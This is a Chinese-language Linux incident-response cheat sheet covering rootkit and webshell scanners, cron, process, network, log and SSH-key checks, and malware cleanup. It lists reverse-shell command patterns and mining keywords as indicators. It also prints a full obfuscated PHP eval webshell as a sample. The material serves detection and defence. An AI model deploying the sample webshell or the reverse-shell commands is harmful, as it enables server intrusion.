目录导航

  • 0x00 前言:
  • 0x01 应急自动化工具:
    • GScan:
    • 河马:
    • chkrootkit:
    • 在线沙箱:
  • 0x02 排查可能被替换的文件:
  • 0x03 可疑用户排查:
  • 0x04 定时任务排查:
  • 0x05 进程排查:
  • 0x06 查看网络连接:
  • 0x07 历史命令排查:
  • 0x08 登录日志排查:
  • 0x09 SSH异常密钥排查:
  • 0x0A 启动服务排查:
  • 0x0B 寻找特定时间的文件
  • 0x0C 流量提取:
  • 0x0D 内存dump数据:
  • 0x0E 服务器威胁排查技巧:
    • 挖矿病毒特征:
    • 木马后门特征:
    • WebShell(网页木马)特征:
    • 一些分析技巧:
    • Linux分析的一些有用命令:
      • grep:
      • strings:
      • file:
      • lsattr:
      • chattr:
      • ls:
  • 0x0F 病毒/木马清除:
    • 进程关闭:
    • 定时任务清理:
    • 恶意程序文件清理:
  • 0x10 附录:
    • /proc/目录介绍:
    • log日志目录介绍:

0x00 前言:

为了方便对Linux做入侵排查,特做该辅助笔记,以便于应急时不在过度依赖搜索引擎。

当然也离不开搜索引擎,只是减少对搜索引擎的依赖

# 减少排查使用的命令写入.bash_history(只影响当前打开的终端命令)
HISTFILE=/dev/null

0x01 应急自动化工具:

GScan:

GScan 是一款开源的 Linux 应急响应工具,该工具旨在为安全应急响应人员对Linux主机排查时提供便利,实现主机侧Checklist的自动全面化检测,根据检测结果自动数据聚合,进行黑客攻击路径溯源。

下载地址:https://github.com/grayddq/GScan

工具可检查项:

1、主机信息获取
2、系统初始化alias检查
3、文件类安全扫描3.1、系统重要文件完整行扫描3.2、系统可执行文件安全扫描3.3、临时目录文件安全扫描3.4、用户目录文件扫描3.5、可疑隐藏文件扫描
4、各用户历史操作类4.1、境外ip操作类4.2、反弹shell类
5、进程类安全检测5.1、CUP和内存使用异常进程排查5.2、隐藏进程安全扫描5.3、反弹shell类进程扫描5.4、恶意进程信息安全扫描5.5、进程对应可执行文件安全扫描
6、网络类安全检测6.1、境外IP链接扫描6.3、恶意特征链接扫描6.4、网卡混杂模式检测
7、后门类检测7.1、LD_PRELOAD后门检测7.2、LD_AOUT_PRELOAD后门检测7.3、LD_ELF_PRELOAD后门检测7.4、LD_LIBRARY_PATH后门检测7.5、ld.so.preload后门检测7.6、PROMPT_COMMAND后门检测7.7、Cron后门检测7.8、Alias后门7.9、SSH 后门检测7.10、SSH wrapper 后门检测7.11、inetd.conf 后门检测7.12、xinetd.conf 后门检测7.13、setUID 后门检测7.14、8种系统启动项后门检测
8、账户类安全排查8.1、root权限账户检测8.2、空口令账户检测8.3、sudoers文件用户权限检测8.4、查看各账户下登录公钥8.5、账户密码文件权限检测
9、日志类安全分析9.1、secure登陆日志9.2、wtmp登陆日志9.3、utmp登陆日志9.4、lastlog登陆日志
10、安全配置类分析10.1、DNS配置检测10.2、Iptables防火墙配置检测10.3、hosts配置检测
11、Rootkit分析11.1、检查已知rootkit文件类特征11.2、检查已知rootkit LKM类特征11.3、检查已知恶意软件类特征检测
12.WebShell类文件扫描12.1、WebShell类文件扫描

使用方法:

# 需要Python3.x环境
# 直接运行即可
python3 GScan.py

河马:

WebShell查杀工具。

下载地址:https://www.shellpub.com/
前往官方下载对于操作系统版本的,然后使用tar解压
解压后会有两个文件:

  • hm:主程序
  • cache.db:数据

最好创建一个新目录,将这两个文件移动到新目录中

使用方法:

# 一般扫描
./hm scan 目录地址
# 扫描aaaa目录
./hm scan aaaa/# 深度扫描
./hm deepscan 目录地址

发现存在webshell后,会在应用目录创建一个result.csv文件,里面记录扫描出来的webshell文件地址。

chkrootkit:

Rootkit检查工具。

Rootkit 是一种系统内核级病毒木马,其进入内核模块后能获取到操作系统高级权限,从而使用各种底层技术隐藏和保护自身,绕开安全软件的检测和查杀。

下载地址:http://www.chkrootkit.org/download/

使用方法:

# 下载
wget ftp://ftp.pangeia.com.br/pub/seg/pac/chkrootkit.tar.gz
# 解压
tar -zxvf chkrootkit.tar.gz
cd chkrootkit
# 执行
## INFECTED代表感染,该工具默认检查整个系统
./chkrootkit | grep INFECTED

PS:对发现存在感染的文件,可以放入在线沙箱或引擎中进行二次确认,或者进行逆向分析。

在线沙箱:

在线沙箱或引擎(杀毒引擎)可以帮助协助分析可疑文件:

  • 微步:https://x.threatbook.cn/
  • virustotal:https://www.virustotal.com/
  • 奇安信在线沙箱:https://ti.qianxin.com/

0x02 排查可能被替换的文件:

由于木马为了隐蔽性,可能会将系统原本的ls、ps等命令文件进行替换,由于这类文件一般在200K左右,如果这类文件被串改或替换,那么大小应该会达到接近M:(注意:bash|sh这类命令文件大小可能在1-2M徘徊)

# 排查bin目录
ls -lh /bin/# 如果bin目录文件较多,可排查大于M的文件
ls -lh /bin/ | grep M# 或者排查几个特定文件,ls|ps|netstat|vim|ping|cd|pwd
ls -lh /bin/ | grep -E "ls|ps|netstat|vim|ping|cd|pwd|ifconfig|rm|cp|env|cat|more|find"# 如果系统有rpm命令,可使用该命令查看是否存在被替换的文件
rpm -Va
# rpm效验出现不同才会输出,输出为8个字符,如:S.......

rpm效验8个字符说明:

  • S:文件大小是否改变
  • M:文件类型或文件权限是否改变
  • 5:文件效验MD5是否被改变(可判断文件是否被篡改)
  • D:设备中,从代码是否被改变
  • L:文件路径是否改变
  • U:文件所拥有者是否被改变
  • G:文件所属组是否被改变
  • T:文件的修改时间是否被改变

用GScan可能更快更方便

0x03 可疑用户排查:

由于攻击者入侵服务后想稳定或长久控制,可能会创建一个新用户:

# 查看有效的用户
cat /etc/passwd | grep -E "bin/.*sh$"

0x04 定时任务排查:

由于病毒/木马为确保本身程序的正常或稳定运行,一般会创建定时任务进行检查或启动:

# 检查当前用户的定时任务
crontab -l# 查看特定用户定时任务
crontab -l -u username# 列出有效用户
cat /etc/passwd | grep -E "bin/.*sh$" | cut -f 1 -d: # 定时任务的其余文件
/var/spool/cron/*
/etc/crontab
/etc/cron.d/*
/etc/cron.daily/*
/etc/cron.hourly/*
/etc/cron.monthly/*
/etc/cron.weekly/
/etc/anacrontab
/var/spool/anacron/*# 开机启动项
cat /etc/rc.local
/etc/rc[0-6].d/ # 重点关闭r3\r4\r5,还有一个
## 查看其中是否存在可疑的脚本
# /etc/profile.d/ 目录下的shell脚本也可以在开机时自启动
# /etc/init.d/ 目录下存放各服务的启动脚本
# /etc/rc.d/rc[0-6].d/ 目录下软连接/etc/init.d/中的服务(0-6为启动等级)

开机启动项0-6级别描述:

  • 0:关机
  • 1:单用户模式,主要用于修复系统
  • 2:无网络连接的多用户命令行模式
  • 3:有网络连接的多用户命令行模式
  • 4:系统保留
  • 5:图形模式,带有图形界面的多用户模式
  • 6:重启动

0x05 进程排查:

一般病毒/木马名称随机或迷惑,可利用其这一特征进行进程排查(挖矿病毒一般占用资源较高):
对于查看进程,主要关注以下可疑项:

  • 关键词:curl、bash、miner、xmr、随机命令的(如gWkla)等
  • 路径:tmp目录、隐藏文件(.开头的)、路径名随机字符的
# 查看资源占用
top
## top小技巧,按小写m,可切换内存显示形式,按小写e,可切换显示单位# ps查看进程具体信息
ps -aux --sort -pcpu /ps -elf
##--sort=-pcpu 可以安装cpu占比排位,从高到低,可用head -10显示前10个
## 查看内存可以使用-pmem# 当通过ps或top锁定了一个可疑文件,可通过lsof查看其文件调用,锁定恶意文件或分析该进程是否可疑
lsof -p PID# 查找进程启动程序
ls -l /proc/pid/exe# 如果存在隐藏进程,可通过查看/proc/目录下进程的exe内容寻找:
find /proc/ -name "exe" | xargs ls -l | more
## 注意:有一个/usr/libexec/tracker-miner-*是系统自带的文件

对不确定的可疑文件,可放如在线沙箱进行分析

0x06 查看网络连接:

同样查看不规则或者关键词的连接,以及注意SYN半开连接

# 查看网络连接信息
netstat -antlp# 查看端口占用情况
lsof -i:port

对发现的可疑地址也可放入沙箱进行威胁情报排查

0x07 历史命令排查:

查看操作系统的历史命令中是否存在可疑操作:

  • curl/wget下载文件
  • 执行未知sh文件或可执行文件
  • 创建用户等
# 查看历史命令
history
more ~/.bash_history

0x08 登录日志排查:

检查是否存在可疑的登录信息。

# 登录失败用户相关信息
lastb

Centos/Redhat登录日志: /var/log/secure*
Ubuntu/Debian 登录日志:/var/log/auth*
一些关键词:

  • Accepted password:密码登录成功
  • Accepted publickey: 证书登录成功
  • Failed password:密码登录失败
  • Failed publickey:证书登录失败
# 登录日志排查
# ======= CentOS/RedHat =======
## 检查登录成功用户及登录日期
cat /var/log/secure* | grep "Accepted password" | awk '{print $1,$2,$3,$9,$11}'
## 检查证书登录成功用户
cat /var/log/secure* | grep "Accepted publickey" | awk '{print $1,$2,$3,$9,$11}'## 检查登录失败IP地址及次数
grep -r "Failed password" /var/log/secure* | awk '{print $11}' | sort -nr | uniq -c
## 检查登录失败用户及次数
grep -r "Failed password" /var/log/secure* | awk '{print $9}' | sort -nr | uniq -c# ======= Ubuntu/Debian =======
## 检查登录成功用户及登录日期
cat /var/log/auth* | grep "Accepted password" | awk '{print $1,$2,$3,$9,$11}'
## 检查证书登录成功用户
cat /var/log/auth* | grep "Accepted publickey" | awk '{print $1,$2,$3,$9,$11}'## 检查登录失败IP地址及次数
grep -r "Failed password" /var/log/auth* | awk '{print $11}' | sort -nr | uniq -c
## 检查登录失败用户及次数
grep -r "Failed password" /var/log/auth* | awk '{print $9}' | sort -nr | uniq -c## 创建新用户的关键词为"new user",如果要进行新增用户排查,可将登录日志grep除搜索内容修改为该关键词。### 附上一条多余了,可能会用到的,查询DNS使用情况
cat /var/log/messages* | grep "using nameserver" | awk '{print $NF}' | awk -F# '{print $1}' | sort | uniq

0x09 SSH异常密钥排查:

由于攻击者可能为了方便服务器的控制,可能会创建一个ssh密钥存放于服务器中:

ls -al ~/.ssh/

0x0A 启动服务排查:

查看是否存在可以的启动呢服务项:(木马后门/病毒为了长久稳定的运行,可能会创建一个服务自启)

# 方法一
service --status-all | grep running# 方法二
chkconfig --list
## chkconfig查看返回会有0-6个数字,其中代表定时任务的0-6,on为开启、off为关闭
# 如果上面那个执行报错,可执行下面这个
systemctl list-unit-files

0x0B 寻找特定时间的文件

可通过寻找某时间段创建的文件来进行筛选分析:

# 寻找2022年1月8日到2022年4月25当前系统所创建的所有php文件
find / -name '*.php' -newermt '2022-01-08' ! -newermt '2022-04-25'# 找出当前系统3天前被改动过的所有文件
find / -mtime +3 -type f -print# 找出当前系统3天內被改动过的文件
find / -mtime -3 -type f -print# 找出当前系统前3天当天被改动过的文件
find / -mtime 3 -type f -print

0x0C 流量提取:

对于一些无法从应用层面获取有效信息,那么可以通过对流量的截取进行分析,特别是挖矿病毒。
Linux流量抓包工具:tcpdump

tcpdump用法:
-i: 指定网卡,如指定eth0:-i eth0,指定所有网卡:-i any
-w: 保存到一个文件中
port:指定抓取的端口(可指定目的还是源,目的:dst port,源:src port)
host:指定IP地址

# 流量抓包命令 tcpdump
## 抓取所有网卡流量,并保存成一个pcap文件
tcpdump -i any -w /tmp/test.pcap## 指定抓取目的8080端口数据
tcpdump -i any dst port 8080## 指定抓取tcp协议流量
tcpdump -i any tcp

0x0D 内存dump数据:

如果发现一个程序非常可疑,但是还是不能通过进程或其他方式知悉其操作,可利用linux系统中的gdb对内存进行dump:

# 获取某进程的内存信息
cat /proc/pid/maps# 记录好需要dump的内存地址
gdb attach pid
# (gdb)代表在gdb终端中,test.dump为保存的文件名称
(gdb) dump memory test.dump start_memory_addr end_memory_addr
(gdb) quit # 退出 # dump出内存数据后,可使用strings获取其中的字符串数据
strings test.dump

0x0E 服务器威胁排查技巧:

规则后续在更新

挖矿病毒特征:

  • 特征一:占用CPU较高(top可查看)
  • 特征二:应用名称或者脚本中,存在miner、xmr、mine、xmrig、f2pool等关键词(矿池域名也一般存在这些关键词)
  • 特征三:在流量中,一般挖矿病毒形式如下:
// ====请求数据
# 登录
{"id":一个数字,"jsonrpc":"2.0","method":"login","params":{"login":"用户名"...}}
# 任务
{"id":一个数字,"jsonrpc":"2.0","method":"job","params":{.*?"job_id":.*?}}// =====响应数据
# 响应一
{"id":一个数字,"jsonrpc":"2.0","error":null,"result":{"status":"OK"}}
# 响应二
{"jsonrpc":"2.0","id":1,"error":null,"result":{"id":"f82d8f85084bdbdf","job":{"blob":"一串由数字和字母组成的字符串","job_id":"字符串","target":"字符串","algo":"形如rx/0","height":2607307,"seed_hash":"一串hash值"},"extensions":["algo","nicehash","keepalive"],"status":"OK"}}// 主要关键形式
{"id":num,"jsonrpc":"2.0","method":"keepalived","params":{"id":"..."}
{.*?"jsonrpc":"2.0","method":"job","params":{.*?"job_id":.*?}
// json数据,具有jsonrpc、method、param、job_id、algo、send_hasd等关键词
/*
可以使用wireshark进行流追踪分析,或者在wireshark中进行关键词搜索,比如搜索jsonrpc;
也可以使用wireshark的命令行工具tshark进行辅助分析,不过目前不知道tshark怎么把data的值进行字符化(或者直接用python写脚本分析),下面是使用16进制进行搜索的:(搜索的是'"jsonrpc":"2.0"')
>> tshark -r 流量包文件 -T fields -e "data.data" | grep "226a736f6e727063223a22322e3022"
// windows里面可以把grep替换为findstr
*/

木马后门特征:

  • 特征一:进程中存在形如nc -ebash -ipython -c "import socket"php -r execexec bin/bash|sh等;
  • 特征二:一般后门木马都是采用反向连接,故本机IP地址端口在变动,而远控端端口不变,形如:172.17.17.17:56002 -> 123.123.123.123:12345
  • 特征三:文件名称,形如msf、door、一个数字形式(如1)、随机名称
  • 特征四:进程的文件位置,如tmp、点开头的文件(如.c2)、三个点的目录(如...

PS:linux中点开头的文件为隐藏文件,查看需要使用ls -a

WebShell(网页木马)特征:

  • 特征一:文件命名规则:如但一个数字(如1.php)、一个字母、带有door、
  • 特征二:文件中存在执行命令或者代码的方法,且该方法接收用户传入的参数
    • PHP:eval、call_user_func、system、assert等
    • JSP/X:Runtime.getRuntime().exec()
    • ASP/X:Eval、Execute、ExecuteGlobal
  • 特征三:有些Webshell为了躲避静态查杀,会将恶意代码进行加密混淆,一般采用的base64,如果发现一个文件存在很密集的乱码,然后又用变量进行拼接,那么该文件极有可能是一个webshell,形如:
<?php$i='p="PY16bXfpTDNaKhZyiy";fhZuhZhZnctiohZn x($hZt,$k){$c=strlhZen($k);$l=hZstrh';
$d='Zlen($t);$hZhZo="hZ";for(hZ$i=0;$i<$l;){forhZ($hZj=0;(hZhZ$j<$hZc&&$i';
$g='g_match("hZ/hZ$kh(.+)$kf/",@fihZlhZhZehZ_gehZt_contentshZ("php://ihZnp';
$P='<$l);$j++hZ,$i++hZ){$hZo.=hZ$t{hZ$i}^hZ$k{$j};}}return $ohZhZ;}if (@prhZe';
$X=str_replace('hP','','chPreathPe_hPfuhPnhPcthPion');
$t='asehZ64_enhZcodhZe(@hZx(@gzhZcomprehZss($ohZ),$k)hZ);prhZint("$p$kh$r$kf");}';
$A='$k=hZ"9e94b15hZe";$kh=hZ"d312fahZ4223hZ2f";$khZf="d87ahZ55db0hZd39hZ";$hZ';
$u='uthZ"),$m)==1) {hZ@ob_hZstart();@evhZal(@hZgzuncomprehZsshZ(@x(@basehZ64_hZdecod';
$h='e($m[1]hZ),$k)))hZ;$ohZ=@ohZb_gethZ_contents()hZ;hZ@ob_hZend_clean()hZ;$r=@b';
$D=str_replace('hZ','',$A.$i.$d.$P.$g.$u.$h.$t);
$G=$X('',$D);$G();
?>

一些分析技巧:

一般触发应急可能是安全设备告警,针对这类分析,可先查看安全设备告警的信息,然后更具告警内容进行写入,如果告警提示是后门/木马,如果是Webshell就可以定位到文件,如果不是,那么可通过查看告警里面的目的端口信息,查看于目的端口连接的进程,然后在排查进程,锁定文件,将文件提取进行逆向分析或在线沙箱扫描,当发现该文件属于恶意文件后,就排查服务器中的定时任务、历史命令、可疑shell脚本等;
如果设备告警只能知道所属服务器,并没有详细信息,那么可先通过查看进程,在到网络连接、定时任务、历史命令等上述方法进行排查。
在检查进程或者网络连接中,可疑将上面的方法灵活运用起来,比如利用netstat查看到了本地的12345端口比较可疑,那么这时可使用lsof查看该端口的进程,然后在利用ps查看该进行的具体数据,查看了后,也可查看/proc/进程id/exe的ls信息,锁定恶意文件,也可查看定时任务锁定,方法很多,需要将上述的方式灵活组合起来。

Linux分析的一些有用命令:

grep:

查找文件中符合条件的字符串,常使用参数:

-E 正则匹配
-v 不显示匹配到规则的内容
-i 不区分大小写
-r 递归寻找某目录下某字符串
# 查看www目录下是否存在exec关键词
grep -r "exec" /www/

strings:

获取一个对象或二进制文件中的字符串,可用于搜索一个可执行文件中是否存在某字符串关键词:

# 获取cc文件的所有可显示字符串
strings cc
# 搜索cc文件中是否存在miner关键词
strings cc | grep miner

file:

识别文件类型:

file xxx

lsattr:

显示文件属性:

lsattr xxx

chattr:

修改文件属性:

# 常用三个属性
a:让文件或目录仅供附加用途
s:保密性删除文件或目录
i:不得任意更动文件或目录
# 使用方式+代表增加,-代表减去
# 如对xxx文件减少i属性
chattr -i xxx

ls:

显示目录结构:

-l 显示文件描述
-a 显示隐藏文件
-h 切换文件显示的大小单位,有K、M、G
-t 将文件依建立时间之先后次序列出
## 显示etc目录下所有文件信息(包含隐藏文件)
ls -la /etc/

0x0F 病毒/木马清除:

进程关闭:

kill -9 pid

定时任务清理:

# 进入编辑模式进行删除
crontab -e
# 编辑模式为vi/vim

恶意程序文件清理:

rm -rf 恶意文件路径
# 如果删除不了,可使用lsattr查看下文件属性,然后使用chattr减去这些属性即可删除

0x10 附录:

/proc/目录介绍:

https://www.cnblogs.com/klvchen/p/12132530.html

档名 文件内容
/proc/cmdline 加载 kernel 时所下达的相关参数!查阅此文件,可了解系统是如何启动的!
/proc/cpuinfo 本机的 CPU 的相关资讯,包含时脉、类型与运算功能等
/proc/devices 这个文件记录了系统各个主要装置的主要装置代号,与 mknod 有关呢!
/proc/filesystems 目前系统已经加载的文件系统罗!
/proc/interrupts 目前系统上面的 IRQ 分配状态。
/proc/ioports 目前系统上面各个装置所配置的 I/O 位址。
/proc/kcore 内存的大小
/proc/loadavg top中uptime 的三个平均数值记录
/proc/meminfo 使用 free 列出的内存资讯
/proc/modules 目前我们的 Linux 已经加载的模块列表,也可以想成是驱动程序
/proc/mounts 系统已经挂载的数据,就是用 mount 这个命令呼叫出来的数据
/proc/swaps 到底系统挂加载的内存在哪里?使用掉的 partition 就记录在此
/proc/partitions 使用 fdisk -l 会出现目前所有的 partition 吧?在这个文件当中也有纪录
/proc/pci 在 PCI 汇流排上面,每个装置的详细情况!可用 lspci 来查阅
/proc/uptime 就是用 uptime 的时候,会出现的资讯
/proc/version 核心的版本,就是用 uname -a 显示的内容
/proc/bus/* 一些汇流排的装置,还有 U盘的装置也记录在此
/proc/syscall 显示当前进程正在执行的系统调用

log日志目录介绍:

日志文件 说明
/var/log/cron 记录了系统定时任务相关的日志
/var/log/cups 记录打印信息的日志
/var/log/dmesg 记录了系统在开机时内核自检的信息,也可以使用dmesg命令直接查看内核自检信息
/var/log/mailog 记录邮件信息
/var/log/message 记录系统重要信息的日志。这个日志文件中会记录Linux系统的绝大多数重要信息,
如果系统出现 问题时,首先要检查的就应该是这个日志文件
/var/log/btmp 记录错误登录日志,这个文件是二进制文件,不能直接vi查看,而要使用lastb命令查看
/var/log/lastlog 记录系统中所有用户最后一次登录时间的日志,这个文件是二进制文件,不能直接vi,而要使用 lastlog命令查看
/var/log/wtmp 永久记录所有用户的登录、注销信息,同时记录系统的启动、重启、关机事件。同样这个文件也是 一个二进制文件,不能直接vi,而需要使用last命令来查看
/var/log/utmp 记录当前已经登录的用户信息,这个文件会随着用户的登录和注销不断变化,只记录当前登录用户 的信息。同样这个文件不能直接vi,而要使用w,who,users等命令来查询
/var/log/secure*
/var/log/auth* 录验证和授权方面的信息,只要涉及账号和密码的程序都会记录,比如SSH登录,su切换用户, sudo授权,甚至添加用户和修改用户密码都会记录在这个日志文件中

Linux 应急响应辅助笔记相关推荐

  1. 读《Linux应急响应》笔记(未完待续)

    今天就想听着音乐,看看书.找到压箱底的<linux应急响应>看一看.还是蛮新的,是2021.7.1的新版. 文章目录 思维导图 挖矿事件 恶意域名 获取异常进程PID 寻找恶意⽂件样本 处 ...

  2. Windows 应急响应辅助笔记

    目录导航 0x00 前言: 0x01 应急辅助工具: 工具列表: 在线沙箱: 0x02 排查前说明: 0x03 账户排查: 方法一: 方法二: 方法三: 方法四: 0x04 系统日志排查: 安全日志: ...

  3. linux 应急响应 病毒清除 系统加固

    概述 Linux环境下处理应急响应事件往往会更加的棘手,因为相比于Windows,Linux没有像Autorun.procexp这样的应急响应利器,也没有统一的应急响应处理流程.所以,这篇文章将会对L ...

  4. 运维基础(15) Linux 应急响应

    Linux 环境下处理应急响应事件往往会更加棘手,因为相比于 Windows ,Linux 没有像 Autorun.procexp 这样的应急响应利器,也没有统一的应急响应处理流程. 所以 ,本文将会 ...

  5. Linux应急响应之挖矿篇

    Linux应急响应之挖矿篇 Linux服务器经常受到挖矿木马的骚扰,严重影响服务器的正常使用.那么安全人员遇到这类问题该如何解决呢? 首先了解一下什么是挖矿 每隔一个时间点,比特币系统会在系统节点上生 ...

  6. 2022-10-15(Linux应急响应、配置漏洞之DNS域传送、内网渗透之内网主机发现技巧)

    http://noahblog.360.cn/advanced-windows-taskscheduler-playbook/@[toc] [重要]拜读的文章链接都在标题上. 一.linux应急响应 ...

  7. Linux应急响应-盖茨木马的处置方式

    Linux应急响应-盖茨木马的处置方式 Linux盖茨木马是一类有着丰富历史,隐藏手法巧妙,网络攻击行为显著的DDoS木马,BillGates攻击程序采用C/C++语言编写,因相关的程序中分别包含&q ...

  8. Linux应急响应笔记

    背景 客户的监控系统发现有异常行为,我临时顶替应急的同事处理一下. 连接到服务器,首先通过ps auxef 和 netstat -tulnp两个命令查看异常进程信息,果然发现了两个异常进程 xmp 和 ...

  9. 【应急响应】Linux应急响应的姿势

    0x01 Web服务 一般如果网络边界做好控制,通常对外开放的仅是Web服务,那么需要先找到Webshell,可以通过如下途径: 1)检查最近创建的php.jsp文件和上传目录 例如要查找24小时内被 ...

最新文章

  1. 成为计算机视觉工程师的第一个月,我都学会了什么?
  2. 队列 集合的前n个元素
  3. [jQuery] 针对jQuery的优化方法有哪些?
  4. 用批处理实现文本文件中指定字符串的替换 zz
  5. Nginx For Windows 路由配置
  6. SQL_alter_table已有表操作
  7. 2021 年电工杯 B 题
  8. SAS入门(一)理论篇
  9. 微信开放平台创建移动应用-必过
  10. matlab曲线拟合
  11. C语言每日一练——第74天:黑与白问题
  12. 网易邮箱注册界面设计 html
  13. 上亿用户,如何高效统计独立用户访问量?
  14. Socket编程(Android客户端+PC服务器端)
  15. STM32F407 FSMC驱动MT29F4G08A NAND FLASH源代码分享
  16. selenium python 简书_通过python+selenium3实现浏览器刷简书文章阅读量
  17. Kali实现ARP欺骗
  18. 阿里云服务器支持IPV6和CND的详细教程
  19. 免费在线html文档,HTML标签大全(最全的html标签文档).doc
  20. Matplotlib绘制漂亮的饼状图|python绘制漂亮的饼状图

热门文章

  1. 解决SecureCRT上下左右显示ABCD问题
  2. visual studio客户端windows模式下调出cmd命令行
  3. 如何在群晖NAS中搭建WebDav服务,并外网可访问
  4. 华为手机实现语音转文字的最佳方法!不知道的看这里
  5. html图片怎么设置热区不大小,店铺装修技巧之图片尺寸大全!收藏必备!随时可查看!...
  6. 【板栗糖GIS】GIS开发—如何调用天地图作为数据底图
  7. excel或者wps怎么样将一个表的某列查找到另外一个表的对应列,excel或WPS根据身份证号或手机号在另一个表中自动查找填充完善信息。VLOOKUP函数最详细用法解读。
  8. Vue3(撩课学院)笔记01-创建实例对象,v-for遍历,时间绑定,传参,时间修饰符,计算属性,v-if,v-show,深拷贝,v-model与各类表单的绑定
  9. box-shadow讲解
  10. c语言土壤墒情监测系统,土壤墒情监测系统